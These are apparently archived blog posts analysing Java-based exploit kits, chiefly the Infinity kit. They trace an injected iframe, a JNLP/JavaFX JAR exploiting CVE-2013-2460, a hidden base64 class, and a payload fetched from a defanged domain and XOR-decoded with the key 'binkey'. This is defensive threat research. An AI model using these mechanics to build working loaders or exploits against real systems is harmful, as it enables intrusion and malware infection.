<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZ1vLUDZuccBPzTpTwuZOU7AVbgWyiiWyP9fJGVgP0fNeZ_HR1ZypI_MKfdDOszB-JVs1bPVSgknF3JiKWgSQY8bvC79CGrbXKB18_34NCJJgFj8cdsi7LBhzcGVUi_poyBPKsMoFcRSHa/s1600/2014-01-Neutrino-bytecode-deobfuscation-comparison.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZ1vLUDZuccBPzTpTwuZOU7AVbgWyiiWyP9fJGVgP0fNeZ_HR1ZypI_MKfdDOszB-JVs1bPVSgknF3JiKWgSQY8bvC79CGrbXKB18_34NCJJgFj8cdsi7LBhzcGVUi_poyBPKsMoFcRSHa/s1600/2014-01-Neutrino-bytecode-deobfuscation-comparison.png" height="143" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<i><span style="font-size: x-small;">Neutrino EK deobfuscation results comparison</span></i></div>
<br />
Where in a few places the results match, the majority of the decompiled source code is different. After the bytecode clean up we can clearly see what happens step-by-step.<br />
<br />
<b><span style="color: #3d85c6;">Short breakdown</span></b><br />
<br />
There are a few ways this bytecode clean up method can be performed in. The steps for the simplest one are below:<br />
<br />
<ul>
<li>take a note of the exceptions(if any exist in the method you're about to edit) - '<span style="color: #3d85c6;">start</span>', '<span style="color: #3d85c6;">end</span>' and '<span style="color: #3d85c6;">handler</span>' addresses and instructions they are pointing at.(my personal preference is to use dirtyJOE for viewing/editing exceptions).</li>
<li>replace '<span style="color: #3d85c6;">push</span>' & '<span style="color: #3d85c6;">pop</span>' patterns with '<span style="color: #3d85c6;">nop</span>' instructions(Java Bytecode Editor allows you to do it more efficiently through text editor style interface).</li>
<li>(optional) edit exception/s values if the addressing skewed for some reason</li>
<li>save the changes and check decompilation results</li>
</ul>
<div>
To make it more challenging you could take it a little bit further and remove '<span style="color: #3d85c6;">nop</span>' instructions completely. A good care should be taken here, as any '<span style="color: #3d85c6;">conditional jumps</span>', '<span style="color: #3d85c6;">goto</span>', etc, instructions would have to be edited (in addition to any existing exceptions) to reflect the new addressing.</div>
<div>
<br /></div>
<div>
<u>NOTE:</u> Java Bytecode Editor performs bytecode integrity check before saving edited methods. It will NOT allow you to save methods that are either performing the sandbox escape(exploit) or those running instructions that leverage post-exploit condition. dirtyJOE will do this dirty job for you, but at the cost of convenient code editor interface.</div>
<div>
<br /></div>
<div>
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-18354276298498455862013-11-24T01:56:00.000+00:002014-01-28T15:29:58.745+00:00Infinity EK: "No...unless round is funny."NOTE: The information is based on a sample captured on 2013-11-22
<br />
<br />
Thanks to <a href="https://twitter.com/Set_Abominae" rel="nofollow" target="_blank">@Set_Abominae</a> for sharing '<span style="color: #3d85c6;">intel</span>' on this sample. The analysis was done using the data gathered during Fiddler '<span style="color: #3d85c6;">live</span>' capture.<br />
<br />
<i><u>Update 2014-01-27: </u></i><br />
<br />
This exploit kit got an official name - Infinity.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhr_9mOsGsqCWXp2DvNeAL13lLipM57ymyr2YeLSLt9JHiRUHg28qyY95TyOpGkqygzYjyRMWykwQLyczW67wwVdoVC-pmu0yetz3AtXIKZt2vHSAMCRU1ZOKXyNQba8DmTtuK_WZa5BDiR/s1600/infinity.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhr_9mOsGsqCWXp2DvNeAL13lLipM57ymyr2YeLSLt9JHiRUHg28qyY95TyOpGkqygzYjyRMWykwQLyczW67wwVdoVC-pmu0yetz3AtXIKZt2vHSAMCRU1ZOKXyNQba8DmTtuK_WZa5BDiR/s1600/infinity.png" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>Infinity Exploit kit logo</i></span></div>
<br />
<br />
<i><u>Update 2013-11-25: </u></i><br />
<br />
<a href="https://twitter.com/PhysicalDrive0" rel="nofollow" target="_blank">@PhysicalDrive0</a> giving this EK a fancy name in <a href="http://vrt-blog.snort.org/2013/11/im-calling-this-goon-exploit-kit-for-now.html" rel="nofollow" target="_blank">this</a> blog post.<br />
<br />
<b><span style="color: #3d85c6;">"Smokey, this is not 'Nam. This is bowling. There are rules."</span></b><br />
<br />
Compromise attempt starts with visiting a website injected with malicious '<span style="color: #3d85c6;"><iframe></span>'.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpVgUABEecZvDtS8r5rfACsfCeTcMOF9xwJhzN99TpO2a82KtDp3dRI750AWmKEM7yFIxrZLKxqYLcF_OG6rEYESWrdbTiLNWn1ctT68SLbOk5qDa233IKAv9SBMlJYgUPZpXBZgu-tV4r/s1600/Unkown_2013-11-22_iframe.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpVgUABEecZvDtS8r5rfACsfCeTcMOF9xwJhzN99TpO2a82KtDp3dRI750AWmKEM7yFIxrZLKxqYLcF_OG6rEYESWrdbTiLNWn1ctT68SLbOk5qDa233IKAv9SBMlJYgUPZpXBZgu-tV4r/s1600/Unkown_2013-11-22_iframe.png" height="7" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;"><iframe> injected into one of the pages on compromised website</span></i></div>
<br />
As a side note, the website in this particular sample had been compromised twice. The same page that redirects the browser to some unknown EK also has '<span style="color: #3d85c6;">CookieBomb</span>' script injected in it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS2XqQOYExdYaj2J-Az88nVaTzL2DprIWhX1IR3FS8T_Lj2xuZHtt0FEdytJoe2txOr8E1yrZNDKfrjrAq-fgzSKYJXYgmcwxs_EaqN9byMx4NirqN3TvXlecQfG-Fvq_VMAORynuxx6a3/s1600/Unkown_2013-11-22_CookieBomb_script.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS2XqQOYExdYaj2J-Az88nVaTzL2DprIWhX1IR3FS8T_Lj2xuZHtt0FEdytJoe2txOr8E1yrZNDKfrjrAq-fgzSKYJXYgmcwxs_EaqN9byMx4NirqN3TvXlecQfG-Fvq_VMAORynuxx6a3/s1600/Unkown_2013-11-22_CookieBomb_script.png" height="166" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">part of '<span style="color: #3d85c6;">CookieBomb</span>' script</span></i></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTJkosb2kBq0S5kHw7TNJkYPMVVW73Vf-U1uA1j_eK7yogLPXHjSbvag1eRMuTPZqtG8eAxn7f5aCwg20iKWEF0XX9hpBE55jz-3WuFkpZhbWwTDpKnOi3fn0jBsvmXrA0hfC8XNyX2FZf/s1600/Unkown_2013-11-22_CookieBomb_script_deobf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTJkosb2kBq0S5kHw7TNJkYPMVVW73Vf-U1uA1j_eK7yogLPXHjSbvag1eRMuTPZqtG8eAxn7f5aCwg20iKWEF0XX9hpBE55jz-3WuFkpZhbWwTDpKnOi3fn0jBsvmXrA0hfC8XNyX2FZf/s1600/Unkown_2013-11-22_CookieBomb_script_deobf.png" height="250" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">part of deobfuscated '<span style="color: #3d85c6;">CookieBomb</span>' script</span></i></div>
<br />
URL the '<span style="color: #3d85c6;">CookieBomb</span>' is leading to was dead at the time the '<span style="color: #3d85c6;">live</span>' capture took place. More on '<span style="color: #3d85c6;">CookieBomb</span>' threat can be found on <a href="http://malwaremustdie.blogspot.com/2013/11/a-step-by-step-decoding-guide-for.html" rel="nofollow" target="_blank">MMD</a> website.<br />
<br />
Back to Unknown EK now, the following URL pattern was observed - <a href="http://pastebin.com/Q3DUG4Jp" rel="nofollow" target="_blank">pastebin.com</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghik4_A7RvowRgbM5gjj2qe9jUDnEa_n1FqJxvzq0KySpihrAF8XflkWdYxg6LrZEVgUgUHGwvpYZ6_s1vSkffrGwosNpgoheQgcDpXKIxxcaBwKCV9Sbtu5zAE17_5JGxWEpIhbHeXoyi/s1600/Unkown_2013-11-22_URL_pattern.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghik4_A7RvowRgbM5gjj2qe9jUDnEa_n1FqJxvzq0KySpihrAF8XflkWdYxg6LrZEVgUgUHGwvpYZ6_s1vSkffrGwosNpgoheQgcDpXKIxxcaBwKCV9Sbtu5zAE17_5JGxWEpIhbHeXoyi/s1600/Unkown_2013-11-22_URL_pattern.png" height="140" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">'<span style="color: #3d85c6;">Unknown EK</span>' URL pattern</span></i></div>
<br />
Seeing '<span style="color: #3d85c6;">cnt.php</span>' redirect script, more likely, indicates that the website was compromised through <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1862" rel="nofollow" target="_blank">CVE-2013-1862</a>. Hendrick Adrian(MMD) covered this subject in great details in one of his <a href="http://malwaremustdie.blogspot.com/2013/06/a-story-of-malware-url-cntphp.html" rel="nofollow" target="_blank">blog</a> posts.<br />
<br />
The EK landing page is as simple as it can only be.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj51pm2Hnfff957C1Jqs6XNcwdXOUHorisc0fE3hujfpsC8XmeKNv6Gdc0jLbYS3IW8iDprZBfl_sHGGz88QJj7Akkfee1c_N7MPkP-KGKUO_RPQYUzCym7fuwWox3LKDgbxZ1xj1XAnRBw/s1600/Unkown_2013-11-22_initial_landing.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj51pm2Hnfff957C1Jqs6XNcwdXOUHorisc0fE3hujfpsC8XmeKNv6Gdc0jLbYS3IW8iDprZBfl_sHGGz88QJj7Akkfee1c_N7MPkP-KGKUO_RPQYUzCym7fuwWox3LKDgbxZ1xj1XAnRBw/s1600/Unkown_2013-11-22_initial_landing.png" height="72" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Unknown EK landing page - request for JNLP</span></i></div>
<br />
JNLP file will launch JavaFX application.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtfiFeOLACC3AESXIF1QZyql4T7HKE3jqW1Kb_wcvCikR6-x6yL5VFpHQf7KeBLzLMymHWZA6nB-F2pzOrbd_5_G1_QamKtz_i2oK3wj0o2k4gQ9fUVOmZnKRCASIldSG-b3EA4kLn4NFR/s1600/Unkown_2013-11-22_JNLP.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtfiFeOLACC3AESXIF1QZyql4T7HKE3jqW1Kb_wcvCikR6-x6yL5VFpHQf7KeBLzLMymHWZA6nB-F2pzOrbd_5_G1_QamKtz_i2oK3wj0o2k4gQ9fUVOmZnKRCASIldSG-b3EA4kLn4NFR/s1600/Unkown_2013-11-22_JNLP.png" height="94" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Unknown EK JNLP file</span></i></div>
<br />
Note a number of HTTP GET requests after JavaFX application JAR is downloaded. These are result of '<span style="color: #3d85c6;">Class-Path</span>' header having references to them in '<span style="color: #3d85c6;">MANIFEST.MF</span>' file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGnRo4S2E-I7lhiTWooWNA-KqNiMADpqKqkNRNP3-nHToesQhI5llzEEHmXXOqfpDOTMmVxoLe1hxA7QVGGhUFk4go4YZEr46ZQUpmtRYPyICN1uSJlNwNPIuPV3my8gSFYtS850_mJr-q/s1600/Unkown_2013-11-22_manifest.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGnRo4S2E-I7lhiTWooWNA-KqNiMADpqKqkNRNP3-nHToesQhI5llzEEHmXXOqfpDOTMmVxoLe1hxA7QVGGhUFk4go4YZEr46ZQUpmtRYPyICN1uSJlNwNPIuPV3my8gSFYtS850_mJr-q/s1600/Unkown_2013-11-22_manifest.png" height="60" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Unknown EK MANIFEST.MF file content</span></i></div>
<br />
Also note, there is no HTTP GET request in Fiddler log for the Initial Payload. This is due to the way it's being requested. During JavaFX application execution the control is passed to '<span style="color: #3d85c6;">javaw.exe</span>' tool along with the class file that requests and executes the Initial Payload. '<span style="color: #3d85c6;">javaw.exe</span>' tool is not '<span style="color: #3d85c6;">proxy-aware</span>' and will send the request directly to the malicious website which technically means if you're on the network behind a web proxy and no direct access to the Internet you're safe from this exploit kit.<br />
<br />
<b><span style="color: #3d85c6;">"Back off, man. I'm a scientist!"</span></b><br />
<br />
There is almost no obfuscation applied to the code - some of the string variable values are split and then concatenated.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSnuG3cpjFYtrimaWyHMvDfftqlxT8UwzdGt8q3LTA4UF1Eg2dFTPN4om4iSxY3qWzBtizNXTTCJMeOlWXOkkOQEv30U81j96isgzsO8d99I7aN5CdJlqUndf0Qehs7GYdEZuYcKGJhbLK/s1600/Unkown_2013-11-22_URL_obfus_example.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSnuG3cpjFYtrimaWyHMvDfftqlxT8UwzdGt8q3LTA4UF1Eg2dFTPN4om4iSxY3qWzBtizNXTTCJMeOlWXOkkOQEv30U81j96isgzsO8d99I7aN5CdJlqUndf0Qehs7GYdEZuYcKGJhbLK/s1600/Unkown_2013-11-22_URL_obfus_example.png" height="13" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">string value obfuscation example</span></i><br />
<div>
<i><span style="font-size: x-small;"><br /></span></i></div>
</div>
The JAR file is armed with an exploit code for <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2460" rel="nofollow" target="_blank">CVE-2013-2460</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu3VbppBF6CxJKa2ZnI8He6ufFFowhYxpwf82BTN6LfHbVk0IjS0U4f-TmOKL_fF65TSePxVJF5T56BPz2ZRVNCUiSAnFvsiuYwloJ5sZXNGGbN96XtY7eBcWYo2vuwawnzkVgW91CFvt5/s1600/Unkown_2013-11-22_CVE-2013-2460.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu3VbppBF6CxJKa2ZnI8He6ufFFowhYxpwf82BTN6LfHbVk0IjS0U4f-TmOKL_fF65TSePxVJF5T56BPz2ZRVNCUiSAnFvsiuYwloJ5sZXNGGbN96XtY7eBcWYo2vuwawnzkVgW91CFvt5/s1600/Unkown_2013-11-22_CVE-2013-2460.png" height="55" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">part of exploit code for '<span style="color: #3d85c6;">CVE-2013-2460</span>'(after deobfuscation)</span></i></div>
<br />
Once execution privileges are elevated, a hidden .class file is decoded and loaded. During this process it'll be saved to Java Temp folder with '<span style="color: #3d85c6;">NewClass.class</span>' filename. The class file is encoded with '<span style="color: #3d85c6;">base64</span>'. It handles Initial Payload download and execution.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaDLXz7Bkb98A0N5A5HxZhSzYBr7MeHyMC3UDyf9ChhUg_Id59ivwnTyC3MgrvsVN33BWA95lZe3qpqwpJgGyVnUUcn6b1pMGXcIjEBeJqI0-GsKNnpM8_SJqVSRwlJ0j0YO_v5cfhwu4v/s1600/Unkown_2013-11-22_hidden_class.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaDLXz7Bkb98A0N5A5HxZhSzYBr7MeHyMC3UDyf9ChhUg_Id59ivwnTyC3MgrvsVN33BWA95lZe3qpqwpJgGyVnUUcn6b1pMGXcIjEBeJqI0-GsKNnpM8_SJqVSRwlJ0j0YO_v5cfhwu4v/s1600/Unkown_2013-11-22_hidden_class.png" height="47" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">part of '<span style="color: #3d85c6;">base64</span>' encoded hidden .class file</span></i></div>
<br />
The Initial Payload URL location is not stored in any of the parameters passed to JVM or variables within the code. Instead, it's generated using some tricks JavaFX has to offer.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOXZPUPBTRuJSn9fE9T23Gas0MvjHEZM34CzJLIQPKKs7PiqJBmPYBdFyLFod3su2iUHxGIpvpDCf_luFaaKg9aY5x7YP1nIhyxEYoxGj8JSHZbBei5UrjbOs_mVJ0BUU51MRKuOz1JBqI/s1600/Unkown_2013-11-22_payload_path_partial.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOXZPUPBTRuJSn9fE9T23Gas0MvjHEZM34CzJLIQPKKs7PiqJBmPYBdFyLFod3su2iUHxGIpvpDCf_luFaaKg9aY5x7YP1nIhyxEYoxGj8JSHZbBei5UrjbOs_mVJ0BUU51MRKuOz1JBqI/s1600/Unkown_2013-11-22_payload_path_partial.png" height="35" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">JavaFX trick to get part of JNLP URI</span></i> </div>
<br />
The code above will return JNLP file parent folder URI - in this case '<span style="color: #3d85c6;">hxxp://vinnypedulla.com/5/201311/</span>'. The second part of the path will be dynamically generated using current time stamp following this pattern '<span style="color: #3d85c6;">HHmmss</span>' - for example, '<span style="color: #3d85c6;">113458.mp3</span>' . The routine in the screenshot below combines both parts and requests the initial payload.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUsSZiiBdVnfhzIWRHNzZEh6yog-URzAhnEsKtKAxMtYRpEG-JTdpQobplTdZrxrCGqGdEN2wZwm28K4Ibmohpeq_b-xs8B1_lDt-rRAumA7n4AUmZZjHPXl5-FhsJPnT6B5Afy0sELwHm/s1600/Unkown_2013-11-22_payload_path_partial2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUsSZiiBdVnfhzIWRHNzZEh6yog-URzAhnEsKtKAxMtYRpEG-JTdpQobplTdZrxrCGqGdEN2wZwm28K4Ibmohpeq_b-xs8B1_lDt-rRAumA7n4AUmZZjHPXl5-FhsJPnT6B5Afy0sELwHm/s1600/Unkown_2013-11-22_payload_path_partial2.png" height="91" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">part of the Initial Payload fetcher code</span></i></div>
<br />
The initial payload filename will be created by adding the same 6 digits(time stamp) and '<span style="color: #3d85c6;">.exe</span>' string together. The file will be stored in Java Temp folder. Before it's stored and executed, it's decoded using XOR with predefined key - '<span style="color: #3d85c6;">binkey</span>'.<br />
<br />
<b><span style="color: #3d85c6;">"Summary"</span></b><br />
<br />
This exploit kit sample is implemented as a JavaFX application. Some variables names suggest the creator of it is a Turkish speaker - names examples: '<span style="color: #3d85c6;">fia</span>', '<span style="color: #3d85c6;">analiz</span>', '<span style="color: #3d85c6;">fout</span>', '<span style="color: #3d85c6;">bais</span>'. Light complexity. Will fail if targeted machine is behind a web proxy and has no direct access to the Internet.<br />
<br />
<div class="CSSTableGenerator">
<table>
<tbody>
<tr>
<td style="background-color: #f79646; color: white;"><b>Summary Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Name:</td>
<td style="background-color: #b8cce4; color: black;">Unknown</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date captured:</td>
<td style="background-color: #b8cce4; color: black;">2013-11-22</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date analysed:</td>
<td style="background-color: #b8cce4; color: black;">2013-11-23</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Source/Credits:</td>
<td style="background-color: #b8cce4; color: black;">Intel source - <a href="https://twitter.com/Set_Abominae" rel="nofollow" target="_blank">@Set_Abominae</a>.<br />
Data source - live traffic capture with Fiddler.</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Infection vectors detected:</td>
<td style="background-color: #b8cce4; color: black;">Java/JavaFX</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Vulnerabilities targeted:</td>
<td style="background-color: #b8cce4; color: black;"><br />
<br />
<li>CVE-2013-2460</li>
</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Landing page</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Transfer mode:</td>
<td style="background-color: #b8cce4; color: black;">plain text</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">TDS:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JNLP:</td>
<td style="background-color: #b8cce4; color: black;">Yes</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JVM parameters:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Java infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Analysed with:</td>
<td style="background-color: #b8cce4; color: black;">Java 1.7.17</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">Simple string values obfuscation</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JAR hidden content:</td>
<td style="background-color: #b8cce4; color: black;">Hidden .class file - 'NewClass.class'</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;">URL</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload encryption/encoding:</td>
<td style="background-color: #b8cce4; color: black;">XOR. key - 'binkey'</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;">Java Temp folder</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;">Generated using current time - HHmmss</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Adobe infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Analysed with:</td>
<td style="background-color: #b8cce4; color: black;">NA</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;">NA</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;">NA</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;">NA</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Automated analysis</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Exploit components:</td>
<td style="background-color: #b8cce4; color: black;"><pre>JAR - <a href="https://www.virustotal.com/en/file/7f8cbf0a861b8fb216b4b254366bce58e37c0f615ed484a12f79dff4b0ce5dfe/analysis/" rel="nofollow" target="_blank">https://www.virustotal.com</a></pre>
</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Delivered malware:</td>
<td style="background-color: #b8cce4; color: black;"><pre>EXE(MD5 b7b352ecb0ea8fc52c5a6a515b85c7e0)
<a href="https://malwr.com/analysis/YjQxZmM5YTJjMjkzNDdiY2JkMzQ4OTc3YmI2YmM4NjA/" rel="nofollow" target="_blank">https://malwr.com/</a>
<a href="https://www.virustotal.com/en/file/294eb42af69ea2e0353566fd18fa4f37b8ba3bfe97716513a21a8717d5e28ef9/analysis/" rel="nofollow" target="_blank">https://www.virustotal.com</a></pre>
</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Additional Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;"><br /></td>
<td style="background-color: #b8cce4; color: black;">EK creator is possibly a Turkish-speaker.</td>
</tr>
</tbody></table>
</div>
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-41583221234838208592013-10-08T13:11:00.000+01:002013-10-08T22:41:14.225+01:00Unknown Java Malware: "Forget it, Jake. It’s Chinatown."NOTE: The information is based on a sample captured on 2013-10-03<br />
<br />
Another '<span style="color: #3d85c6;">piece of art</span>' work by some actor learning how to '<span style="color: #3d85c6;">copy/paste</span>' code. There is nothing wrong with copy/paste as long as you understand what the code does. Judging by the amount of unused code that even includes '<span style="color: #3d85c6;">System.out.println</span>' statements, seems the author was afraid to change and accidentally break it. This in turn helped to narrow down a potential region where the Java code is coming from. This is also another example of Java malware that is not using any exploit code, but targeting users with administrator privileges on their machines. I'll tag it '<span style="color: #3d85c6;">Java Malware</span>' as it doesn't fit the definition of an exploit kit. The real danger of this type of malware is stealthiness - as long as the payload it delivers is not being detected by AV(and it's quite easily achievable).<br />
<br />
<b><span style="color: #3d85c6;">"Toto, I've a feeling we're not in Kansas anymore."</span></b><br />
<br />
The URL pattern for this sample is short and simple.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRtvxQ5kSbAQw4u3R5Wp6x6vHdtTNQM0BytGectnSQK5o4y6wWmTzUowtS45-2xfDIVEf6L18xHxHyNlkiRQkbQCscNynfks-cglyHraqm3vmdFOW7IYWTfX8Byrax0cVy5xi1LeXWA6Re/s1600/Unknown_2013-10-03_URL_pattern.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRtvxQ5kSbAQw4u3R5Wp6x6vHdtTNQM0BytGectnSQK5o4y6wWmTzUowtS45-2xfDIVEf6L18xHxHyNlkiRQkbQCscNynfks-cglyHraqm3vmdFOW7IYWTfX8Byrax0cVy5xi1LeXWA6Re/s1600/Unknown_2013-10-03_URL_pattern.png" height="36" width="320" /></a></div>
<br />
The landing page doesn't have any sophisticated parts either, but at least there are simple checks for Java presence and OS type performed before pulling down Java JAR file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9ohMMeejnhZqbJVQxCr8eoIPaQIwGgD81tPofPZe8GkdR8YwgeUUjp66AT7b2LqEtkWybgMuOBpOplh31rnE8wX8PiES_tpdQXzvdC7W-1Pok8EWiI3k4o1FjXRutyQi4LtcSUQN-pERc/s1600/Unknown_2013-10-03_Java_check.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9ohMMeejnhZqbJVQxCr8eoIPaQIwGgD81tPofPZe8GkdR8YwgeUUjp66AT7b2LqEtkWybgMuOBpOplh31rnE8wX8PiES_tpdQXzvdC7W-1Pok8EWiI3k4o1FjXRutyQi4LtcSUQN-pERc/s1600/Unknown_2013-10-03_Java_check.png" height="177" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">checking for Java Web Start or JNLP support in the browser </span></i></div>
<br />
Even though the checks above are performed, JNLP technology is not utilized to deliver the JAR file. These checks simply identify if Java RE is present. Returned '<span style="color: #3d85c6;">boolean</span>' value steers the execution and if found to be '<span style="color: #3d85c6;">false</span>' will stop the script execution and exit. If Java is found the following condition is checked next.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
